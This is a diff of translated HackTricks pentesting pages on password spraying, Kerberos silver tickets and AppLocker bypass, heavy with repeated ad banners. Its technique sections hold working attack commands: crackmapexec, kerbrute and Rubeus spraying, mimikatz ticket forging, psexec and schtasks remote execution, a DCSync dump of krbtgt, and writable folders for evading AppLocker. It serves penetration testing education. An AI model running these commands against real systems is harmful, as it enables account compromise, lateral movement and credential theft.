使用 [**Trickest**](https://trickest.com/?utm\_source=hacktricks\&utm\_medium=text\&utm\_campaign=ppc\&utm\_term=trickest\&utm\_content=pass-the-ticket) 可以轻松构建和**自动化工作流程**,使用世界上**最先进**的社区工具。\
立即获取访问权限:
使用 [**Trickest**](https://trickest.com/?utm\_source=hacktricks\&utm\_medium=text\&utm\_campaign=ppc\&utm\_term=trickest\&utm\_content=pass-the-ticket) 轻松构建和 **自动化工作流程**,由世界上 **最先进** 的社区工具提供支持。\
今天就获取访问权限:
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=pass-the-ticket" %}
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>支持 HackTricks</summary>
支持 HackTricks 的其他方式:
* 如果您想看到您的**公司在 HackTricks 中做广告**或**下载 PDF 版本的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** 上关注我们**。
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

View file

@ -1,31 +1,32 @@
# 密码喷洒 / 暴力破解
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
## **密码喷洒**
一旦您找到了几个**有效的用户名**,您可以尝试使用最**常见的密码**(请记住环境的密码策略)与每个发现的用户一起。\
**默认情况下****密码的最小长度**为**7**
一旦你找到了几个 **有效的用户名**,你可以尝试每个发现的用户使用最 **常见的密码**(请记住环境的密码策略)。\
默认情况下,**最小** **密码** **长度****7**
常见用户名列表也可能有用:[https://github.com/insidetrust/statistically-likely-usernames](https://github.com/insidetrust/statistically-likely-usernames)
常见用户名列表也可能有用:[https://github.com/insidetrust/statistically-likely-usernames](https://github.com/insidetrust/statistically-likely-usernames)
请注意,如果您尝试多次输入错误密码,**可能会锁定一些帐户**默认情况下超过10次)。
请注意,如果你尝试多个错误密码,**可能会锁定某些账户**(默认情况下超过 10 次)。
### 获取密码策略
如果您有一些用户凭据或作为域用户的shell您可以使用以下方法**获取密码策略**
如果你有一些用户凭据或作为域用户的 shell你可以 **通过以下方式获取密码策略**
```bash
# From Linux
crackmapexec <IP> -u 'user' -p 'password' --pass-pol
@ -42,7 +43,7 @@ net accounts
(Get-DomainPolicy)."SystemAccess" #From powerview
```
### 从 Linux或所有系统)进行利用
### 从Linux或所有进行利用
* 使用 **crackmapexec:**
```bash
@ -51,18 +52,18 @@ crackmapexec smb <IP> -u users.txt -p passwords.txt
## --local-auth flag indicate to only try 1 time per machine
crackmapexec smb --local-auth 10.10.10.10/23 -u administrator -H 10298e182387f9cab376ecd08491764a0 | grep +
```
* 使用 [**kerbrute**](https://github.com/ropnop/kerbrute)Go
* 使用 [**kerbrute**](https://github.com/ropnop/kerbrute) (Go)
```bash
# Password Spraying
./kerbrute_linux_amd64 passwordspray -d lab.ropnop.com [--dc 10.10.10.10] domain_users.txt Password123
# Brute-Force
./kerbrute_linux_amd64 bruteuser -d lab.ropnop.com [--dc 10.10.10.10] passwords.lst thoffman
```
* [**喷洒**](https://github.com/Greenwolf/Spray) _**(您可以指定尝试次数以避免锁定):**_
* [**spray**](https://github.com/Greenwolf/Spray) _**(您可以指示尝试次数以避免锁定):**_
```bash
spray.sh -smb <targetIP> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes> <DOMAIN>
```
* 使用 [**kerbrute**](https://github.com/TarlogicSecurity/kerbrute)python- 有时不推荐使用可能无法正常工作
* 使用 [**kerbrute**](https://github.com/TarlogicSecurity/kerbrute) (python) - 不推荐,有时无法正常工作
```bash
python kerbrute.py -domain jurassic.park -users users.txt -passwords passwords.txt -outputfile jurassic_passwords.txt
python kerbrute.py -domain jurassic.park -users users.txt -password Password123 -outputfile jurassic_passwords.txt
@ -78,9 +79,9 @@ for u in $(cat users.txt); do
rpcclient -U "$u%Welcome1" -c "getusername;quit" 10.10.10.10 | grep Authority;
done
```
#### 来自Windows
#### Windows
* 使用[Rubeus](https://github.com/Zer1t0/Rubeus)带有brute模块的版本:
* 使用带有暴力模块的[Rubeus](https://github.com/Zer1t0/Rubeus)版本:
```bash
# with a list of users
.\Rubeus.exe brute /users:<users_file> /passwords:<passwords_file> /domain:<domain_name> /outfile:<output_file>
@ -88,11 +89,11 @@ done
# check passwords for all users in current domain
.\Rubeus.exe brute /passwords:<passwords_file> /outfile:<output_file>
```
* 使用[**Invoke-DomainPasswordSpray**](https://github.com/dafthack/DomainPasswordSpray/blob/master/DomainPasswordSpray.ps1)(默认情况下,它可以从域中生成用户,并从域中获取密码策略,并根据策略限制尝试次数):
* 使用 [**Invoke-DomainPasswordSpray**](https://github.com/dafthack/DomainPasswordSpray/blob/master/DomainPasswordSpray.ps1)(它可以默认从域中生成用户,并将从域中获取密码策略,并根据该策略限制尝试次数):
```powershell
Invoke-DomainPasswordSpray -UserList .\users.txt -Password 123456 -Verbose
```
* 使用[**Invoke-SprayEmptyPassword.ps1**](https://github.com/S3cur3Th1sSh1t/Creds/blob/master/PowershellScripts/Invoke-SprayEmptyPassword.ps1)
* 使用 [**Invoke-SprayEmptyPassword.ps1**](https://github.com/S3cur3Th1sSh1t/Creds/blob/master/PowershellScripts/Invoke-SprayEmptyPassword.ps1)
```
Invoke-SprayEmptyPassword
```
@ -106,7 +107,7 @@ legba kerberos --target 127.0.0.1 --username admin --password wordlists/password
## Outlook Web Access
有多个工具可用于进行Outlook密码喷洒攻击
有多种工具可以进行**密码喷洒 Outlook**
* 使用 [MSF Owa\_login](https://www.rapid7.com/db/modules/auxiliary/scanner/http/owa\_login/)
* 使用 [MSF Owa\_ews\_login](https://www.rapid7.com/db/modules/auxiliary/scanner/http/owa\_ews\_login/)
@ -114,7 +115,7 @@ legba kerberos --target 127.0.0.1 --username admin --password wordlists/password
* 使用 [DomainPasswordSpray](https://github.com/dafthack/DomainPasswordSpray)Powershell
* 使用 [MailSniper](https://github.com/dafthack/MailSniper)Powershell
要使用这些工具中的任何一个,您需要一个用户列表和一个密码/一小密码列表进行喷洒。
要使用这些工具中的任何一个,您需要一个用户列表和一个密码/一小部分密码列表进行喷洒。
```bash
./ruler-linux64 --domain reel2.htb -k brute --users users.txt --passwords passwords.txt --delay 0 --verbose
[x] Failed: larsson:Summer2020
@ -123,7 +124,7 @@ legba kerberos --target 127.0.0.1 --username admin --password wordlists/password
[x] Failed: c.cube:Summer2020
[+] Success: s.svensson:Summer2020
```
## 谷歌
## Google
* [https://github.com/ustayready/CredKing/blob/master/credking.py](https://github.com/ustayready/CredKing/blob/master/credking.py)
@ -133,23 +134,24 @@ legba kerberos --target 127.0.0.1 --username admin --password wordlists/password
* [https://github.com/Rhynorater/Okta-Password-Sprayer](https://github.com/Rhynorater/Okta-Password-Sprayer)
* [https://github.com/knavesec/CredMaster](https://github.com/knavesec/CredMaster)
## 参考资料
## References
* [https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-password-spraying](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-password-spraying)
* [https://www.ired.team/offensive-security/initial-access/password-spraying-outlook-web-access-remote-shell](https://www.ired.team/offensive-security/initial-access/password-spraying-outlook-web-access-remote-shell)
* [www.blackhillsinfosec.com/?p=5296](https://www.blackhillsinfosec.com/?p=5296)
* [https://hunter2.gitbook.io/darthsidious/initial-access/password-spraying](https://hunter2.gitbook.io/darthsidious/initial-access/password-spraying)
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF版本的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**上关注**我们。
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

View file

@ -1,41 +1,39 @@
# Silver Ticket
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>Support HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
<figure><img src="../../.gitbook/assets/i3.png" alt=""><figcaption></figcaption></figure>
**赏金提示****注册**Intigriti这是一家由黑客创建的高级**赏金平台**!今天加入我们,开始赚取高达\*\*$100,000\*\*的赏金![**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks)
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
{% embed url="https://go.intigriti.com/hacktricks" %}
## 银票据
## Silver ticket
**银票据**攻击涉及利用Active DirectoryAD环境中的服务票据。该方法依赖于**获取服务帐户例如计算机帐户的NTLM哈希**以伪造票据授予服务TGS票据。借助这个伪造的票据,攻击者可以访问网络上的特定服务,**冒充任何用户**通常目标是获取管理权限。强调使用AES密钥来伪造票据更安全且更不易被检测。
**银票**攻击涉及在Active Directory (AD)环境中利用服务票证。此方法依赖于**获取服务帐户的NTLM哈希**,例如计算机帐户,以伪造票证授予服务(TGS)票证。通过这个伪造的票证,攻击者可以访问网络上的特定服务,**冒充任何用户**通常目标是获取管理权限。强调使用AES密钥伪造票证更安全且不易被检测。
对于票据制作,根据操作系统使用不同的工具:
### 在Linux
对于票证制作,根据操作系统使用不同的工具:
### On Linux
```bash
python ticketer.py -nthash <HASH> -domain-sid <DOMAIN_SID> -domain <DOMAIN> -spn <SERVICE_PRINCIPAL_NAME> <USER>
export KRB5CCNAME=/root/impacket-examples/<TICKET_NAME>.ccache
python psexec.py <DOMAIN>/<USER>@<TARGET> -k -no-pass
```
### 在Windows上
```bash
# Create the ticket
mimikatz.exe "kerberos::golden /domain:<DOMAIN> /sid:<DOMAIN_SID> /rc4:<HASH> /user:<USER> /service:<SERVICE> /target:<TARGET>"
@ -47,50 +45,52 @@ mimikatz.exe "kerberos::ptt <TICKET_FILE>"
# Obtain a shell
.\PsExec.exe -accepteula \\<TARGET> cmd
```
CIFS服务被强调为访问受害者文件系统的常见目标但其他服务如HOST和RPCSS也可以被利用来执行任务和WMI查询。
## 可用服务
| 服务类型 | 服务银票 |
| --------------------- | ---------------------------------------------------------------- |
| WMI | <p>HOST</p><p>RPCSS</p> |
| PowerShell远程 | <p>HOST</p><p>HTTP</p><p>根据操作系统不同还有</p><p>WSMAN</p><p>RPCSS</p> |
| WinRM | <p>HOST</p><p>HTTP</p><p>在某些情况下,您可以直接请求WINRM</p> |
| 计划任务 | HOST |
| Windows文件共享也包括psexec | CIFS |
| LDAP操作包括DCSync | LDAP |
| Windows远程服务器管理工具 | <p>RPCSS</p><p>LDAP</p><p>CIFS</p> |
| 黄金票证 | krbtgt |
| 服务类型 | 服务银票 |
| ------------------------------------------ | ---------------------------------------------------------------- |
| WMI | <p>HOST</p><p>RPCSS</p> |
| PowerShell远程管理 | <p>HOST</p><p>HTTP</p><p>根据操作系统还包括</p><p>WSMAN</p><p>RPCSS</p> |
| WinRM | <p>HOST</p><p>HTTP</p><p>在某些情况下,您可以请求WINRM</p> |
| 计划任务 | HOST |
| Windows文件共享也包括psexec | CIFS |
| LDAP操作包括DCSync | LDAP |
| Windows远程服务器管理工具 | <p>RPCSS</p><p>LDAP</p><p>CIFS</p> |
| 黄金票据 | krbtgt |
使用**Rubeus**,您可以使用以下参数请求所有这些票证
使用**Rubeus**,您可以使用以下参数**请求所有**这些票据
* `/altservice:host,RPCSS,http,wsman,cifs,ldap,krbtgt,winrm`
### 银票事件ID
* 4624: 帐户登录
* 4634: 帐户注销
* 4672: 管理员登录
* 4624:账户登录
* 4634:账户注销
* 4672管理员登录
## 滥用服务票
## 滥用服务票
在以下示例中,假设通过模拟管理员帐户检索了票证
在以下示例中,假设票据是通过模拟管理员账户获取的
### CIFS
有了这张票,您就可以通过**SMB**访问`C$`和`ADMIN$`文件夹(如果它们被公开),并通过执行类似以下操作将文件复制到远程文件系统的某个位置:
使用此票据,您将能够通过**SMB**访问`C$`和`ADMIN$`文件夹(如果它们被暴露),并通过执行类似以下操作将文件复制到远程文件系统的一部分:
```bash
dir \\vulnerable.computer\C$
dir \\vulnerable.computer\ADMIN$
copy afile.txt \\vulnerable.computer\C$\Windows\Temp
```
您还可以获得主机内部的 shell 或使用 **psexec** 执行任意命令:
### 主机
{% content-ref url="../lateral-movement/psexec-and-winexec.md" %}
[psexec-and-winexec.md](../lateral-movement/psexec-and-winexec.md)
{% endcontent-ref %}
有了这个权限,您可以在远程计算机中生成计划任务并执行任意命令:
### HOST
凭借此权限,您可以在远程计算机上生成计划任务并执行任意命令:
```bash
#Check you have permissions to use schtasks over a remote server
schtasks /S some.vuln.pc
@ -102,11 +102,9 @@ schtasks /query /S some.vuln.pc
#Run created schtask now
schtasks /Run /S mcorp-dc.moneycorp.local /TN "SomeTaskName"
```
### HOST + RPCSS
### 主机 + RPCSS
使用这些票据,您可以在受害系统中执行 WMI
使用这些票证,您可以**在受害者系统中执行 WMI**
```bash
#Check you have enough privileges
Invoke-WmiMethod -class win32_operatingsystem -ComputerName remote.computer.local
@ -116,32 +114,37 @@ Invoke-WmiMethod win32_process -ComputerName $Computer -name create -argumentlis
#You can also use wmic
wmic remote.computer.local list full /format:list
```
找到有关 **wmiexec** 的更多信息,请访问以下页面:
在以下页面查找有关**wmiexec的更多信息**
{% content-ref url="../lateral-movement/wmicexec.md" %}
[wmicexec.md](../lateral-movement/wmicexec.md)
{% content-ref url="../lateral-movement/wmiexec.md" %}
[wmiexec.md](../lateral-movement/wmiexec.md)
{% endcontent-ref %}
### 主机 + WSMAN (WINRM)
通过计算机上的winrm访问您可以**访问它**甚至获取PowerShell
### HOST + WSMAN (WINRM)
通过 winrm 访问计算机,您可以 **访问它**,甚至获取 PowerShell
```bash
New-PSSession -Name PSC -ComputerName the.computer.name; Enter-PSSession PSC
```
检查以下页面以了解 **使用 winrm 连接远程主机的更多方法**
{% content-ref url="../lateral-movement/winrm.md" %}
[winrm.md](../lateral-movement/winrm.md)
{% endcontent-ref %}
{% hint style="warning" %}
请注意,**winrm 必须在远程计算机上处于活动状态并监听**才能访问它。
{% endhint %}
### LDAP
拥有这个权限后,您可以使用**DCSync**来转储域控制器数据库:
凭借此权限,您可以使用 **DCSync** 转储 DC 数据库:
```
mimikatz(commandline) # lsadump::dcsync /dc:pcdc.domain.local /domain:domain.local /user:krbtgt
```
**了解更多关于 DCSync** 在以下页面:
**了解更多关于DCSync**请查看以下页面:
## 参考资料
## 参考文献
* [https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberos-silver-tickets](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberos-silver-tickets)
* [https://www.tarlogic.com/blog/how-to-attack-kerberos/](https://www.tarlogic.com/blog/how-to-attack-kerberos/)
@ -152,20 +155,21 @@ mimikatz(commandline) # lsadump::dcsync /dc:pcdc.domain.local /domain:domain.loc
<figure><img src="../../.gitbook/assets/i3.png" alt=""><figcaption></figcaption></figure>
**漏洞赏金提示****注册**Intigriti一个由黑客创建的高级**漏洞赏金平台**!立即加入我们,访问 [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks),开始赚取高达\*\*$100,000\*\*的赏金!
**漏洞赏金提示****注册** **Intigriti**,一个由黑客为黑客创建的高级**漏洞赏金平台**!今天就加入我们,访问 [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks),开始赚取高达 **$100,000** 的赏金!
{% embed url="https://go.intigriti.com/hacktricks" %}
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始成为AWS黑客大师使用</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

View file

@ -1,32 +1,33 @@
# Windows安全控制
# Windows Security Controls
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[NFT收藏品](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
<figure><img src="../.gitbook/assets/image (3) (1) (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../.gitbook/assets/image (3) (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
使用[**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks)可以轻松构建和**自动化工作流程**,使用世界上**最先进的**社区工具。\
立即获取访问权限:
使用 [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) 轻松构建和 **自动化工作流程**,由世界上 **最先进** 的社区工具提供支持。\
今天就获取访问权限:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
## AppLocker策略
## AppLocker 策略
应用程序白名单是一份批准的软件应用程序或可在系统上存在和运行的可执行文件列表。其目标是保护环境免受有害恶意软件和与组织特定业务需求不符的未经批准软件的影响。
应用程序白名单是一个经过批准的软件应用程序或可执行文件的列表,这些程序被允许在系统上存在和运行。其目标是保护环境免受有害恶意软件和不符合组织特定业务需求的未批准软件的影响。
[AppLocker](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/applocker/what-is-applocker)是微软的**应用程序白名单解决方案**,使系统管理员可以控制**用户可以运行的应用程序和文件**。它提供对可执行文件、脚本、Windows安装程序文件、DLL、打包应用和打包应用安装程序的**细粒度控制**。\
组织通常会**阻止cmd.exe和PowerShell.exe**以及对某些目录的写访问,**但这些都可以被绕过**。
[AppLocker](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/applocker/what-is-applocker) 是微软的 **应用程序白名单解决方案**,为系统管理员提供对 **用户可以运行哪些应用程序和文件** 的控制。它提供对可执行文件、脚本、Windows 安装程序文件、DLL、打包应用程序和打包应用程序安装程序的 **细粒度控制**。\
组织通常会 **阻止 cmd.exe 和 PowerShell.exe** 以及对某些目录的写访问,**但这一切都可以被绕过**。
### 检查
@ -39,60 +40,60 @@ Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
$a = Get-ApplockerPolicy -effective
$a.rulecollections
```
这个注册表路径包含了AppLocker应用的配置和策略提供了一种查看系统上当前生效规则集的方式
此注册表路径包含由 AppLocker 应用的配置和策略,提供了一种查看系统上强制执行的当前规则集的方法
* `HKLM\Software\Policies\Microsoft\Windows\SrpV2`
### 绕过
* 用于绕过AppLocker策略的有用**可写文件夹**如果AppLocker允许在`C:\Windows\System32`或`C:\Windows`中执行任何操作,那么有**可写文件夹**可用于**绕过此限制**
* 有用的 **可写文件夹** 用于绕过 AppLocker 策略:如果 AppLocker 允许在 `C:\Windows\System32``C:\Windows` 内执行任何内容,则可以使用 **可写文件夹****绕过此限制**
```
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\System32\spool\drivers\color
C:\Windows\Tasks
C:\windows\tracing
```
* 常见的**受信任的**[**"LOLBAS's"**](https://lolbas-project.github.io/)二进制文件也可以用来绕过AppLocker。
* 常见的 **trusted** [**"LOLBAS's"**](https://lolbas-project.github.io/) 二进制文件也可以用于绕过 AppLocker。
* **编写不当的规则也可能被绕过**
